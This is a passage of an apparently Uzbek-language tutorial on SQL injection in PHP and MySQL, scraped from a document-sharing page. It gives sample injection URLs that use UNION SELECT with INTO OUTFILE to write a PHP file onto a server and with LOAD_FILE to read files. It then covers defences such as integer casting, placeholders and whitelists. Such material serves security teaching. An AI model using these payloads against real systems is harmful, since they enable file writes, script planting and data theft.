Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017

Download 306,49 Kb.

bet	5/24
Sana	21.06.2022
Hajmi	306,49 Kb.
	#689874

1 2 3 4 5 6 7 8 9 ... 24

Bog'liq
Защита от SQL

Fayllarni oqish Fayllarni oqish ularni yozishdan ham osonroqdir. Biz tanlagan maydon orniga LOAD_FILE
Himoya usullari

Fayllarni o'qish/yozish
Fayllarni o'qish va yozish uchun ma'lumotlar bazasi foydalanuvchisi FILE_PRIV ruxsatiga ega bo'lishi kerak.

Fayllarni yozish
Aslida, hamma narsa juda oddiy. Fayl yozish uchun biz OUTFILE funksiyasidan foydalanamiz .
sqlinj/index2.php?user=-1' UNION SELECT 1,2,3,4,5 INTO OUTFILE '1.php' --%20
Ajoyib , fayl bizda yozildi. Shu kabi, biz skript yozishimiz mumkin:
sqlinj/index2.php?user=-1' UNION SELECT 1,'',3,4,5 INTO OUTFILE '1.php' --%20
Fayllarni o'qish
Fayllarni o'qish ularni yozishdan ham osonroqdir. Biz tanlagan maydon o'rniga
LOAD_FILE funksiyasidan foydalaning :
sqlinj/index2.php?user=-1' UNION SELECT 1,LOAD_FILE('1.php'),3,4,5 --%20
Shunday qilib, biz o'qib chiqdik. oldingi yozilgan fayl.

Himoya usullari
O'zingizni himoya qilish zaiflikdan foydalanishdan ham osonroqdir. Faqat ma'lumotlarni filtrlang. Agar siz raqamlarni uzatayotgan bo'lsangiz, foydalaning
$id = (int) $_GET['id'];

PHP va MySQL -da SQL in'ektsiyasi himoyasi
PlaceHolder – Marketingda to'ldiruvchi shakl maydoni ichidagi maslahatdir. Masalan, "Parol" maydoniga "Kamida 6 ta belgi" kiritishingiz kerak bo'lgan maslahatni kiritishingiz mumkin. Texnologiya ma'lumotlarni kiritish jarayonini osonlashtirish uchun yaratilgan. Ushbu PlaceHolder iborasini biz “To`ldiruvchi” deb yuritamiz.

Bizni in'ektsiyadan himoya qiladigan qoidalar

to'ldiruvchilar orqali almashtiriladi
biz identifikatorlar va kalit so'zlarni faqat kodimizda ko'rsatilgan oq ro'yxatga almashtiramiz.

Faqat ikkita qoida.
Albatta, ushbu qoidalarni amalda qo'llash batafsilroq yoritishni talab qiladi.Lekin bu ro'yxat katta afzalliklarga ega - bu aniq va to'liq. Ommabop singdirilgan " mysql_real_escape_string orqali foydalanuvchi kiritishidan qochish " yoki "har doim tayyorlangan bayonotlardan foydalanish" qoidalaridan farqli o'laroq, ushbu qoidalar to'plami halokatli noto'g'ri (avvalgisi kabi) yoki to'liq emas (ikkinchisi kabi) emas.
Ammo keling, batafsil tahlilga o'tamiz.
To'ldiruvchilar - ma'lumotlarni almashtirish
Asosan, bu erda hamma narsa oddiy: har qanday ma'lumot so'rovni to'g'ridan-to'g'ri kiritmasligi kerak, lekin ma'lum bir vakil orqali, joker belgi orqali.So'rov shunday shaklda yoziladi, masalan,

Download 306,49 Kb.

Do'stlaringiz bilan baham:

1 2 3 4 5 6 7 8 9 ... 24